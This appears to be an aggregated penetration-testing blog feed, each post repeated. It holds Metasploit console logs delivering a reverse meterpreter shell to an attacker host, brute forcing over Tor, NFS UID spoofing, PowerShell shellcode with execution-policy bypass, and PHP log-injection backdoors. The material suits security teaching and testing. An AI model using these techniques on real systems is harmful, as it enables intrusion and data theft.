msf  exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.


msf  exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]

I've tested this on windows 7 and windows XP and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.

Usage*:

copy \\ip\documents\myexe.exe myexe.exe

You may have to net use first

net use \\ip\documents\ /User:Guest

You'll see windows attempt the request of SMB, fail, then switch to doing the WebDAV thing.

Once the bin is on the box you can exec the bin manually.

*there are a couple of other ways to run this, the guy that asked me to help with all this will have a post on it soon.

code is HERE in the github repo, be gentle i dont usually do exploit code...

-CG

Tags:

6:00

WebDAV Server to Download Custom Executable or MSF Generated Executables

» ‎ Carnal0wnage


msf  exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
   LOCALFILE   myexe.exe        yes       The filename to serve up
   LOCALROOT   /tmp/            yes       The local file path
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH     /                yes       The URI to use (do not change).


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>  windows/meterpreter/reverse_tcp
msf  exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST =>  192.168.26.129
smsf  exploit(webdav_file_server) > set LPORT 5555
LPORT =>  5555

msf  exploit(webdav_file_server) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.26.129:80/
[*] Server started.

msf  exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload

**Manually execute the exe**


[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012

Now if you want to serve a local exe


msf  exploit(webdav_file_server) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf  exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE

msf  exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.


msf  exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]

Tags: nbsp-nbsp-nbsp-nbsp-nbsp metasploit basename Pentesting

June 05, 2012
8:44
Burp Intruder and Timing Options
» ‎ carnal0wnage.attackresearch.com

Quick post on timing options with Burp Intruder.

Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly. That sux.

I regularly use Intruder to do my brute forcing for me, specially since you can add timing options.

You can intercept your request, send to intruder, then add a payload marker for the username (and password if you want to do username/username)
Setting the payload spots
So if you just want to iterate through a list of usernames with the same pass, you just set the pass then go to payloads and add your userlist. Above, I'm doing username and username as the password and using the pitchfork attack type. ( I think Ken has gone over this in depth, so i'll stop explaining all that unless people ask for it).

Our list of usernames
Once that is set up, you can play with timing options from the options tab. This will adjust number of threads and how long to wait in between requests.
Timing options
You may also want to send everything through tor. Check the Burp main options tab.

-CG
Tags:

8:44
Burp Intruder and Timing Options
» ‎ Carnal0wnage

Quick post on timing options with Burp Intruder.

Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly. That sux.

I regularly use Intruder to do my brute forcing for me, specially since you can add timing options.

You can intercept your request, send to intruder, then add a payload marker for the username (and password if you want to do username/username)
Setting the payload spots
So if you just want to iterate through a list of usernames with the same pass, you just set the pass then go to payloads and add your userlist. Above, I'm doing username and username as the password and using the pitchfork attack type. ( I think Ken has gone over this in depth, so i'll stop explaining all that unless people ask for it).

Our list of usernames
Once that is set up, you can play with timing options from the options tab. This will adjust number of threads and how long to wait in between requests.
Timing options
You may also want to send everything through tor. Check the Burp main options tab.

-CG
Tags: intruder username timing ken juniper-ssl list-of-usernames ssl-vpns timing-options Pentesting

May 29, 2012
5:30
From LOW to PWNED [12] Trace.axd
» ‎ carnal0wnage.attackresearch.com
Post [12] Trace.axd

"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application’s root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit=”[n]” in the application’s configuration file."
http://www.ucertify.com/article/what-is-traceaxd.html

It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information—the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.
http://www.dotnetperls.com/trace

LOW? Actually a Medium.

What can I do with it?
- Read ALL variables and data from HTTP requests
- POST requests rock! ?
Discovery?
- Metasploit
- Vuln Scanners
Metasploit
Example
Main trace.axd page
Viewing a request
Post request with creds
-CG

Tags:

5:30
From LOW to PWNED [12] Trace.axd
» ‎ Carnal0wnage
Post [12] Trace.axd

"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application’s root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit=”[n]” in the application’s configuration file."
http://www.ucertify.com/article/what-is-traceaxd.html

It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information—the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.
http://www.dotnetperls.com/trace

LOW? Actually a Medium.

What can I do with it?
- Read ALL variables and data from HTTP requests
- POST requests rock! ?
Discovery?
- Metasploit
- Vuln Scanners
Metasploit
Example
Main trace.axd page
Viewing a request
Post request with creds
-CG

Tags: axd file trace read-all trace-details separate-page root-directory Pentesting

May 25, 2012
5:00
From LOW to PWNED [11] Honorable Mention: Open NFS
» ‎ carnal0wnage.attackresearch.com

Post [11] Honorable Mention: Open NFS

Open NFS mounts/shares are awesome. talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions. so checking to see whats shared and what you can access is important.

Low? currently an "info" with Nessus 5

Anyway, you probably want to know about finding it. You have a few options.

standard portscanning (of course)

1. scan for port 111/2049
2. do showmount -e / showmount -a
3. metasploit module

example:
root@attacker]# showmount -e 192.168.0.1
Export list for 192.168.0.1:
/export/home/ (everyone)
/export/mnt/ (everyone)
/export/share/ (everyone)

3. look to see what's exported and who is mounting ("everyone" FTW)

To mount an NFS share use the following after first creating a directory on your local machine:
[root@attacker~]#mount -t nfs 192.168.0.1:/export/home /tmp/badperms
change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1
to abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:
"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the share
umount /local_dir

create a user called dave
useradd dave
passwd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into daves directory
cd dave

issue the command
su dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc."
NfSpy is supposed to assist with the above: https://github.com/bonsaiviking/NfSpy

nmap scripts to do additional info gathering

nfs-ls
nfs-showmount
nfs-statfs

Valsmith and hdmoore gave their tactical exploitation talk at defcon 15 and talked about NFS (file services section of the slides) video white paper they also gave it at blackhat in a much longer format, unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy)

Fun Reading:
Swiss Cyber Storm II Case: NFS Hacking: http://www.csnc.ch/misc/files/publications/2009_scsII_axel_neumann_NFS.pdf
Tags:

5:00
From LOW to PWNED [11] Honorable Mention: Open NFS
» ‎ Carnal0wnage

Post [11] Honorable Mention: Open NFS

Open NFS mounts/shares are awesome. talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions. so checking to see whats shared and what you can access is important.

Low? currently an "info" with Nessus 5

Anyway, you probably want to know about finding it. You have a few options.

standard portscanning (of course)

1. scan for port 111/2049
2. do showmount -e / showmount -a
3. metasploit module

example:
root@attacker]# showmount -e 192.168.0.1
Export list for 192.168.0.1:
/export/home/ (everyone)
/export/mnt/ (everyone)
/export/share/ (everyone)

3. look to see what's exported and who is mounting ("everyone" FTW)

To mount an NFS share use the following after first creating a directory on your local machine:
[root@attacker~]#mount -t nfs 192.168.0.1:/export/home /tmp/badperms
change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1
to abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:
"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the share
umount /local_dir

create a user called dave
useradd dave
passwd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into daves directory
cd dave

issue the command
su dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc."
NfSpy is supposed to assist with the above: https://github.com/bonsaiviking/NfSpy

nmap scripts to do additional info gathering

nfs-ls
nfs-showmount
nfs-statfs

Valsmith and hdmoore gave their tactical exploitation talk at defcon 15 and talked about NFS (file services section of the slides) video white paper they also gave it at blackhat in a much longer format, unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy)

Fun Reading:
Swiss Cyber Storm II Case: NFS Hacking: http://www.csnc.ch/misc/files/publications/2009_scsII_axel_neumann_NFS.pdf
Tags: nbsp export nfs export-share portscanning sticky-bit Pentesting

May 21, 2012
5:00
From LOW to PWNED [10] Honorable Mention: FCKeditor
» ‎ carnal0wnage.attackresearch.com

Post [10] Honorable Mention: FCKeditor

FCKeditor is bundled with seems-like everything (ColdFusion, Drupal plugins, WordPress plugins, other random CMSs) and has probably been responsible for countless hacks via file upload issues.

Examples:

http://www.exploit-db.com/exploits/12697/
http://www.exploit-db.com/exploits/15484/
http://www.exploit-db.com/exploits/17644/

Big O'l list on Exploit-DB

CVEdetails on FCKeditor.

LOW?

Actually most FCKeditors checks in Nessus I found were either Medium or High (hence honorable mention and not in the talk).

There is a good write-up of a classic case of FCKEditor abuse here:

http://secureyes.net/nw/assets/File-Upload-Vulnerability-in-FCKEditor.pdf

Google Dorks

inurl:/editor/filemanager/browser/default/connectors/[LANGUAGE]/connector.php

Tags:

5:00
From LOW to PWNED [10] Honorable Mention: FCKeditor
» ‎ Carnal0wnage

Post [10] Honorable Mention: FCKeditor

FCKeditor is bundled with seems-like everything (ColdFusion, Drupal plugins, WordPress plugins, other random CMSs) and has probably been responsible for countless hacks via file upload issues.

Examples:

http://www.exploit-db.com/exploits/12697/
http://www.exploit-db.com/exploits/15484/
http://www.exploit-db.com/exploits/17644/

Big O'l list on Exploit-DB

CVEdetails on FCKeditor.

LOW?

Actually most FCKeditors checks in Nessus I found were either Medium or High (hence honorable mention and not in the talk).

There is a good write-up of a classic case of FCKEditor abuse here:

http://secureyes.net/nw/assets/File-Upload-Vulnerability-in-FCKEditor.pdf

Google Dorks

inurl:/editor/filemanager/browser/default/connectors/[LANGUAGE]/connector.php

Tags: browser-default cmss nessus Pentesting

May 18, 2012
5:00
From LOW to PWNED [9] Apple Filing Protocol (AFP)
» ‎ carnal0wnage.attackresearch.com
Post [9] Apple Filing Protocol (AFP)

The Apple Filing Protocol (AFP) is a network protocol that offers file services for Mac OS X and original Mac OS. In Mac OS X, AFP is one of several file services supported including Server Message Block (SMB), Network File System (NFS), File Transfer Protocol (FTP), and WebDAV.
http://en.wikipedia.org/wiki/Apple_Filing_Protocol

Lives on TCP port 548

LOW?

What can I do with it?
- Read access to files/folders (always fun)
- Write access (sometimes)
Discovery?
- Vuln scanners (duh)
- Nmap scripts
Nmap examples

Connecting to AFP servers
Super easy if you have a MacLinux you can use Afpfs-ng

Window? dunno. Don't think so...

Tags:

5:00
From LOW to PWNED [9] Apple Filing Protocol (AFP)
» ‎ Carnal0wnage
Post [9] Apple Filing Protocol (AFP)

The Apple Filing Protocol (AFP) is a network protocol that offers file services for Mac OS X and original Mac OS. In Mac OS X, AFP is one of several file services supported including Server Message Block (SMB), Network File System (NFS), File Transfer Protocol (FTP), and WebDAV.
http://en.wikipedia.org/wiki/Apple_Filing_Protocol

Lives on TCP port 548

LOW?

What can I do with it?
- Read access to files/folders (always fun)
- Write access (sometimes)
Discovery?
- Vuln scanners (duh)
- Nmap scripts
Nmap examples

Connecting to AFP servers
Super easy if you have a MacLinux you can use Afpfs-ng

Window? dunno. Don't think so...

Tags: protocol file afp mac-os read don apple-filing transfer-protocol-ftp server-message-block file-transfer-protocol Pentesting

May 15, 2012
7:58
PowerShell, Shellcode, metasploit, x64
» ‎ carnal0wnage.attackresearch.com

This is a quick blog post based on my slides from the May 2012 NovaHackers Meeting

Two posts got me started looking at PowerShell and its ability to execute shellcode

http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

and

http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html

The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!

The second post talks about doing something more than calc.exe...getting shell whooo hooooo

You can review the code but it only shows a x86/32bit shellcode. This will fail miserably on x64.

I was initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:

Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome i am during pentests

or

Invoke 32 bit PowerShell and run 32 bit shellcode (now we get http/https payloads)

So googling turned up a way to tell PowerShell to use the x86 version even on x64. The solution i used was here: http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx

You will need to set the execution policy for v1.0 powershell, or possibly try a bypass technique.

I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if its not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.

[Byte[]]$sc = $sc32 if ($env:Processor_Architecture -ne "x86") { write-warning "WTF! This is 64x, switching to 32x and continuing script." &"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass exit }

now it works

Remember that you have to migrate out of the PowerShell process.
Much like the office macro and shellcode exec, if user closes office, or you close exit powershell process shell goes bye-bye.

References:

http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx

Tags:

7:58
PowerShell, Shellcode, metasploit, x64
» ‎ Carnal0wnage

This is a quick blog post based on my slides from the May 2012 NovaHackers Meeting

Two posts got me started looking at PowerShell and its ability to execute shellcode

http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

and

http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html

The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!

The second post talks about doing something more than calc.exe...getting shell whooo hooooo

You can review the code but it only shows a x86/32bit shellcode. This will fail miserably on x64.

I was initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:

Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome i am during pentests

or

Invoke 32 bit PowerShell and run 32 bit shellcode (now we get http/https payloads)

So googling turned up a way to tell PowerShell to use the x86 version even on x64. The solution i used was here: http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx

You will need to set the execution policy for v1.0 powershell, or possibly try a bypass technique.

I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if its not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.

[Byte[]]$sc = $sc32 if ($env:Processor_Architecture -ne "x86") { write-warning "WTF! This is 64x, switching to 32x and continuing script." &"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass exit }

now it works

Remember that you have to migrate out of the PowerShell process.
Much like the office macro and shellcode exec, if user closes office, or you close exit powershell process shell goes bye-bye.

References:

http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx

Tags: nbsp powershell shellcode nicolas metasploit processor-architecture whooo

May 14, 2012
5:00
From LOW to PWNED [8] Honorable Mention: Log File Injection
» ‎ carnal0wnage.attackresearch.com
Post [8] Honorable Mention: Log File Injection

So this didn't make it into the talk, but was in the hidden slides...

not positive this is a "low" but a friend suggested it, so here you go.

Goes like this:
Request gets logged
Something malicious gets written commonly something like a one line PHP backdoor
1. 1. Use an LFI vulnerability to browse to page get shell
2. 2. Wait for an admin to view logs and do whatever you did (XSS)
Can also do fun stuff like this (TNS Logfile injection in Oracle)

Tags:

5:00
From LOW to PWNED [8] Honorable Mention: Log File Injection
» ‎ Carnal0wnage
Post [8] Honorable Mention: Log File Injection

So this didn't make it into the talk, but was in the hidden slides...

not positive this is a "low" but a friend suggested it, so here you go.

Goes like this:
Request gets logged
Something malicious gets written commonly something like a one line PHP backdoor
1. 1. Use an LFI vulnerability to browse to page get shell
2. 2. Wait for an admin to view logs and do whatever you did (XSS)
Can also do fun stuff like this (TNS Logfile injection in Oracle)

Tags: nbsp injection log hidden-slides proof-of-concept honorable-mention Pentesting

May 11, 2012
5:00
From LOW to PWNED [7] HTTP PUT/WebDAV/SEARCH
» ‎ carnal0wnage.attackresearch.com

Post [7] HTTP PUT/WebDAV/SEARCH

Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
*Dirbusting and ruby FTW*

I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.

Once you have a directory you want to test you can use cadaver to manually test, davtest, or Ryan Linn's metasploit module for testing for WebDAV.

I've also done some posts on webDAV in the past

http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html

hdm had done a post on it in the past in relation to the asp payload, i cant find it on the R7 site but its mirrored here: http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html

Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf

HTTP PUT

HTTP PUT/SEARCH usually gets rolled into

Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you. I don't think any vuln scanners do, i'm sure someone will correct me if i'm wrong.

Writable HTTP PUT is rare (least for me) although some friends say they see it all the time.

metasploit has a module to test for PUT functionality as well. http://www.metasploit.com/modules/auxiliary/scanner/http/http_put
HTTP SEARCH
HTTP SEARCH can be fun. When enabled, will give you a listing of every file in the webroot.
Mubix did a post on it http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html

Tags:

5:00
From LOW to PWNED [7] HTTP PUT/WebDAV/SEARCH
» ‎ Carnal0wnage

Post [7] HTTP PUT/WebDAV/SEARCH

Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
*Dirbusting and ruby FTW*

I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.

Once you have a directory you want to test you can use cadaver to manually test, davtest, or Ryan Linn's metasploit module for testing for WebDAV.

I've also done some posts on webDAV in the past

http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html

hdm had done a post on it in the past in relation to the asp payload, i cant find it on the R7 site but its mirrored here: http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html

Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf

HTTP PUT

HTTP PUT/SEARCH usually gets rolled into

Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you. I don't think any vuln scanners do, i'm sure someone will correct me if i'm wrong.

Writable HTTP PUT is rare (least for me) although some friends say they see it all the time.

metasploit has a module to test for PUT functionality as well. http://www.metasploit.com/modules/auxiliary/scanner/http/http_put
HTTP SEARCH
HTTP SEARCH can be fun. When enabled, will give you a listing of every file in the webroot.
Mubix did a post on it http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html

Tags: script-logs blah-blah metasploit Pentesting

May 07, 2012
5:00
From LOW to PWNED [6] SharePoint
» ‎ carnal0wnage.attackresearch.com
Post [6] SharePoint

Misconfigured SharePoint can be *really* useful. Examples of things you can do with it are:
- User/Domain Enumeration
- Access to useful files
Regular / Auth Protected SharePoint also gives you a point to conduct brute-force attacks against AD or SharePoint users.

We regularly find awesome stuff once we have access to SharePoint. Its not uncommon to find service account passwords, alarm information, employee directories, all kinds of useful stuff.

LOW?

Finding SharePoint servers

random targets...lots of interesting things can be found with google dorks.

If you need to look at specific servers:

Stach and Liu's has released their SharePoint Diggity tools
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/

you can also roll your own
http://code.google.com/p/fuzzdb/source/browse/trunk/Discovery/PredictableRes/Sharepoint.fuzz.txt

Examples of open access

If you have credentials you can use web services calls to pull information from AD, from: http://blog.mindedsecurity.com/2011/07/athcon-2011-presentation.html

Stuff to read:
http://www.mindedsecurity.com/fileshare/Fedon_Athcon_June11.pdf
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/
https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

Tags:

5:00
From LOW to PWNED [6] SharePoint
» ‎ Carnal0wnage
Post [6] SharePoint

Misconfigured SharePoint can be *really* useful. Examples of things you can do with it are:
- User/Domain Enumeration
- Access to useful files
Regular / Auth Protected SharePoint also gives you a point to conduct brute-force attacks against AD or SharePoint users.

We regularly find awesome stuff once we have access to SharePoint. Its not uncommon to find service account passwords, alarm information, employee directories, all kinds of useful stuff.

LOW?

Finding SharePoint servers

random targets...lots of interesting things can be found with google dorks.

If you need to look at specific servers:

Stach and Liu's has released their SharePoint Diggity tools
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/

you can also roll your own
http://code.google.com/p/fuzzdb/source/browse/trunk/Discovery/PredictableRes/Sharepoint.fuzz.txt

Examples of open access

If you have credentials you can use web services calls to pull information from AD, from: http://blog.mindedsecurity.com/2011/07/athcon-2011-presentation.html

Stuff to read:
http://www.mindedsecurity.com/fileshare/Fedon_Athcon_June11.pdf
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/
https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

Tags: employee-directories account-passwords google Pentesting

May 04, 2012
5:00
From LOW to PWNED [5] Honorable Mention: Null Sessions
» ‎ carnal0wnage.attackresearch.com
Post [5] Honorable Mention: Null Sessions

Null sessions are old school. they used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can come in useful is
- Against mis-configured servers
- Against domain controllers to pull info
Low? actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can a list of users for the domain

You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.

Tags:

5:00
From LOW to PWNED [5] Honorable Mention: Null Sessions
» ‎ Carnal0wnage
Post [5] Honorable Mention: Null Sessions

Null sessions are old school. they used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can come in useful is
- Against mis-configured servers
- Against domain controllers to pull info
Low? actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can a list of users for the domain

You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.

Tags: nbsp null domain cain null-sessions brute-force rpcclient Pentesting

May 01, 2012
5:00
From LOW to PWNED [4] Browsable Directories
» ‎ carnal0wnage.attackresearch.com

Post [4] Browsable Directories

"Index of" can be your friend and the same with "web mirroring". Unfortunately, and also to the point of the talk/series you have to go look at this crap. It's *usually* not important. stuff like the /icons/ in Apache.

But every now and then pure gold will show up. so you have to go look at it.

LOW?

So some examples of browsable directories that were not /icons/ :-)

yeah yeah but real world?! so for story time, we were doing a PT, the site had SQL Injection so were able to pull down lots of data but the sensitive stuff was *encrypted* so we were kinda stuck. Poking around further we found a directory with indexing enabled. what was there? database backup and a site back up with the decryptMe PHP function along with the current encrypt key :-) All from a "low" vulnerability.

Tags:

5:00
From LOW to PWNED [4] Browsable Directories
» ‎ Carnal0wnage

Post [4] Browsable Directories

